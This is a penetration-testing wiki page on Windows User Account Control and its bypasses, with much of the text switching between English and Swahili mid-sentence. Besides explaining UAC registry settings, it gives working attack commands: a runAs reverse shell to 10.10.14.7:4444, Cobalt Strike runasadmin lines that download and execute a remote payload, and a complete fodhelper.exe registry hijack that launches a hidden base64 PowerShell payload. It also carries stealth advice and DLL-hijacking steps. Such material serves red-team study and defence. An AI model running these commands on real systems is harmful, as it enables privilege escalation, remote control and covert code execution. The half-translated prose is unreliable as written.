UAC - User Account Control

Reading time: 14 minutes

UAC

User Account Control (UAC) is a feature that enables a consent prompt for elevated activities. Applications have different integrity levels, and a program with a high level can perform tasks that could potentially compromise the system. When UAC is enabled, applications and tasks always run under the security context of a non-administrator account unless an administrator explicitly authorizes these applications/tasks to have administrator-level access to the system to run. It is a convenience feature that protects administrators from unintended changes but is not considered a security boundary.

For more info about integrity levels:

Integrity Levels

When UAC is in place, an administrator user is given 2 tokens: a standard user key, to perform regular actions as regular level, and one with the admin privileges.

This page discusses how UAC works in great depth and includes the logon process, user experience, and UAC architecture. Administrators can use security policies to configure how UAC works specific to their organization at the local level (using secpol.msc), or configured and pushed out via Group Policy Objects (GPO) in an Active Directory domain environment. The various settings are discussed in detail here. There are 10 Group Policy settings that can be set for UAC. The following table provides additional detail:

UAC Bypass Theory

Some programs are autoelevated automatically if the user belongs to the administrator group. These binaries have inside their Manifests the autoElevate option with value True. The binary has to be signed by Microsoft also.

Many auto-elevate processes expose functionality via COM objects or RPC servers, which can be invoked from processes running with medium integrity (regular user-level privileges). Note that COM (Component Object Model) and RPC (Remote Procedure Call) are methods Windows programs use to communicate and execute functions across different processes. For example, IFileOperation COM object is designed to handle file operations (copying, deleting, moving) and can automatically elevate privileges without a prompt.

Note that some checks might be performed, like checking if the process was run from the System32 directory, which can be bypassed for example injecting into explorer.exe or another System32-located executable.

Another way to bypass these checks is to modify the PEB. Every process in Windows has a Process Environment Block (PEB), which includes important data about the process, such as its executable path. By modifying the PEB, attackers can fake (spoof) the location of their own malicious process, making it appear to run from a trusted directory (like system32). This spoofed information tricks the COM object into auto-elevating privileges without prompting the user.

Then, to bypass the UAC (elevate from medium integrity level to high) some attackers use this kind of binaries to execute arbitrary code because it will be executed from a High level integrity process.

You can check the Manifest of a binary using the tool sigcheck.exe from Sysinternals. (sigcheck.exe -m <file>) And you can see the integrity level of the processes using Process Explorer or Process Monitor (of Sysinternals).

Kagua UAC

To confirm if UAC is enabled do:

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA    REG_DWORD    0x1

Ikiwa ni 1 basi UAC imewezeshwa, ikiwa ni 0 au haipo, basi UAC imezimwa.

Kisha, angalia ni kiwango gani kimewekwa:

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
ConsentPromptBehaviorAdmin    REG_DWORD    0x5

• If 0 then, UAC won't prompt (like disabled)
• If 1 the admin is asked for username and password to execute the binary with high rights (on Secure Desktop)
• If 2 (Always notify me) UAC will always ask for confirmation to the administrator when he tries to execute something with high privileges (on Secure Desktop)
• If 3 like 1 but not necessary on Secure Desktop
• If 4 like 2 but not necessary on Secure Desktop
• if 5(default) it will ask the administrator to confirm to run non Windows binaries with high privileges

Then, you have to take a look at the value of LocalAccountTokenFilterPolicy
If the value is 0, then, only the RID 500 user (built-in Administrator) is able to perform admin tasks without UAC, and if its 1, all accounts inside "Administrators" group can do them.

And, finally take a look at the value of the key FilterAdministratorToken
If 0(default), the built-in Administrator account can do remote administration tasks and if 1 the built-in account Administrator cannot do remote administration tasks, unless LocalAccountTokenFilterPolicy is set to 1.

Summary

• If EnableLUA=0 or doesn't exist, no UAC for anyone
• If EnableLua=1 and LocalAccountTokenFilterPolicy=1 , No UAC for anyone
• If EnableLua=1 and LocalAccountTokenFilterPolicy=0 and FilterAdministratorToken=0, No UAC for RID 500 (Built-in Administrator)
• If EnableLua=1 and LocalAccountTokenFilterPolicy=0 and FilterAdministratorToken=1, UAC for everyone

All this information can be gathered using the metasploit module: post/windows/gather/win_privs

You can also check the groups of your user and get the integrity level:

net user %username%
whoami /groups | findstr Level

UAC bypass

The UAC bypass inahitajika katika hali ifuatayo: UAC imewezeshwa, mchakato wako unaendesha katika medium integrity context, na mtumiaji wako ni sehemu ya administrators group.

Ni muhimu kutaja kwamba ni ngumu zaidi kufanya UAC bypass ikiwa iko kwenye kiwango cha juu kabisa cha usalama (Always) kuliko ikiwa iko katika mojawapo ya viwango vingine (Default).

UAC disabled

Ikiwa UAC tayari imezimwa (ConsentPromptBehaviorAdmin is 0) unaweza kutekeleza reverse shell kwa admin privileges (high integrity level) kwa kutumia kitu kama:

#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"

UAC bypass with token duplication

• https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/
• https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html

Msingi Sana UAC "bypass" (ufikiaji kamili wa mfumo wa faili)

Ikiwa una shell na mtumiaji ambaye yuko ndani ya Administrators group unaweza mount the C$ shared via SMB (file system) local in a new disk na utakuwa na ufikiaji kwa kila kitu ndani ya mfumo wa faili (hata folda ya nyumbani ya Administrator).

net use Z: \\127.0.0.1\c$
cd C$

#Or you could just access it:
dir \\127.0.0.1\c$\Users\Administrator\Desktop

UAC bypass na cobalt strike

Mbinu za Cobalt Strike zitatumika tu ikiwa UAC haijawekwa kwenye kiwango chake cha juu kabisa cha usalama.

# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
# UAC bypass via service
elevate svc-exe [listener_name]

# Bypass UAC with Token Duplication
runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"

Empire na Metasploit pia zina moduli kadhaa za bypass UAC.

KRBUACBypass

Nyaraka na chombo ziko katika https://github.com/wh0amitz/KRBUACBypass

UAC bypass exploits

UACME ambayo ni mkusanyiko wa UAC bypass exploits kadhaa. Kumbuka kwamba utahitaji compile UACME using visual studio or msbuild. Mchakato wa compilation utaunda executables kadhaa (kama Source\Akagi\outout\x64\Debug\Akagi.exe), utahitaji kujua which one you need.
Unapaswa kuwa mwangalifu kwa sababu baadhi ya bypasses zitasababisha kuamsha programu nyingine ambazo zitatuma kuarifu kwa mtumiaji kwamba kuna kitu kinachoendelea.

UACME ina toleo la build ambalo kila mbinu ilianza kufanya kazi. Unaweza kutafuta mbinu inayohusu matoleo yako:

PS C:\> [environment]::OSVersion.Version

Major  Minor  Build  Revision
-----  -----  -----  --------
10     0      14393  0

Pia, kwa kutumia this ukurasa unapata toleo la Windows 1607 kutoka kwa matoleo ya build.

UAC Bypass – fodhelper.exe (Registry hijack)

Binary ya kuaminika fodhelper.exe inaongezwa moja kwa moja (auto-elevated) kwenye Windows za kisasa. Inapozinduliwa, huuliza path ya registry ya kila-mtumiaji iliyo hapa chini bila kuthibitisha kitenzi DelegateExecute. Kuweka amri hapo kumruhusu mchakato wa Medium Integrity (mtumiaji yuko katika Administrators) kuanzisha mchakato wa High Integrity bila onyo la UAC.

Registry path queried by fodhelper:

HKCU\Software\Classes\ms-settings\Shell\Open\command

Hatua za PowerShell (weka payload yako, kisha amsha):

# Optional: from a 32-bit shell on 64-bit Windows, spawn a 64-bit PowerShell for stability
C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell -nop -w hidden -c "$PSVersionTable.PSEdition"

# 1) Create the vulnerable key and values
New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force | Out-Null

# 2) Set default command to your payload (example: reverse shell or cmd)
# Replace <BASE64_PS> with your base64-encoded PowerShell (or any command)
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -e <BASE64_PS>" -Force

# 3) Trigger auto-elevation
Start-Process -FilePath "C:\\Windows\\System32\\fodhelper.exe"

# 4) (Recommended) Cleanup
Remove-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open" -Recurse -Force

Notes:

• Inafanya kazi wakati mtumiaji wa sasa ni mwanachama wa Administrators na kiwango cha UAC ni default/lenient (sio Always Notify yenye vikwazo vya ziada).
• Tumia njia ya sysnative kuanzisha PowerShell ya 64-bit kutoka kwenye mchakato wa 32-bit kwenye Windows 64-bit.
• Payload inaweza kuwa amri yoyote (PowerShell, cmd, au njia ya EXE). Epuka kuonyeshwa kwa UIs ili kubaki stealth.

Zaidi ya UAC bypass

Tekniki zote zilizotumika hapa kwa ajili ya ku-bypass UAC zinahitaji full interactive shell na mwathiriwa (shell ya kawaida ya nc.exe haitoshi).

Unaweza kupata hili kwa kutumia session ya meterpreter. Hamia kwenye process ambayo ina thamani ya Session sawa na 1:

(explorer.exe inapaswa kufanya kazi)

UAC Bypass na GUI

Kama una ufikiaji wa GUI unaweza kukubali tu UAC prompt unapoipata; kwa hivyo hauhitaji kweli bypass. Kupata ufikiaji wa GUI kutakuwezesha bypass UAC.

Zaidi ya hayo, ikiwa unapata session ya GUI ambayo mtu alikuwa akitumia (pengine kupitia RDP) kuna vifaa vichache vitakavyokuwa vikiendesha kama administrator ambavyo unaweza kuitumia cmd kwa mfano kama admin moja kwa moja bila kuulizwa tena na UAC kama https://github.com/oski02/UAC-GUI-Bypass-appverif. Hii inaweza kuwa kidogo stealthy.

Noisy brute-force UAC bypass

Ikiwa hujali kuhusu kusababisha sauti/kuonekana unaweza daima kuendesha kitu kama https://github.com/Chainski/ForceAdmin kinachomwomba mtumiaji kuinua ruhusa hadi mtumiaji anapokubali.

Bypass yako mwenyewe - Mbinu msingi ya UAC bypass

Ikiangalia UACME utaona kwamba most UAC bypasses abuse a Dll Hijacking vulnerability (hasa kuandika dll mbaya kwenye C:\Windows\System32). Read this to learn how to find a Dll Hijacking vulnerability.

1. Tafuta binary itakayofanya autoelevate (hakikisha kwamba inapotekelezwa inaendesha kwa high integrity level).
2. Kwa procmon tafuta matukio ya "NAME NOT FOUND" ambayo yanaweza kuwa hatarini kwa DLL Hijacking.
3. Huenda utahitaji kuandika DLL ndani ya baadhi ya protected paths (kama C:\Windows\System32) ambapo huna ruhusa za kuandika. Unaweza ku-bypass hili kwa kutumia:
4. wusa.exe: Windows 7,8 and 8.1. Inaruhusu kutoa yaliyomo ya faili la CAB ndani ya protected paths (kwa sababu zana hii inaendeshwa kutoka high integrity level).
5. IFileOperation: Windows 10.
6. Tayarisha script kunakili DLL yako ndani ya protected path na kuendesha binary yenye udhaifu na inayoautoelevate.

Another UAC bypass technique

Inahusisha kuangalia kama autoElevated binary inajaribu read kutoka kwa registry jina/path ya binary au command itakayotekelezwa (hii ni ya kuvutia zaidi ikiwa binary inatafuta taarifa hii ndani ya HKCU).

References

• HTB: Rainbow – SEH overflow to RCE over HTTP (0xdf) – fodhelper UAC bypass steps
• LOLBAS: Fodhelper.exe
• Microsoft Docs – How User Account Control works
• UACME – UAC bypass techniques collection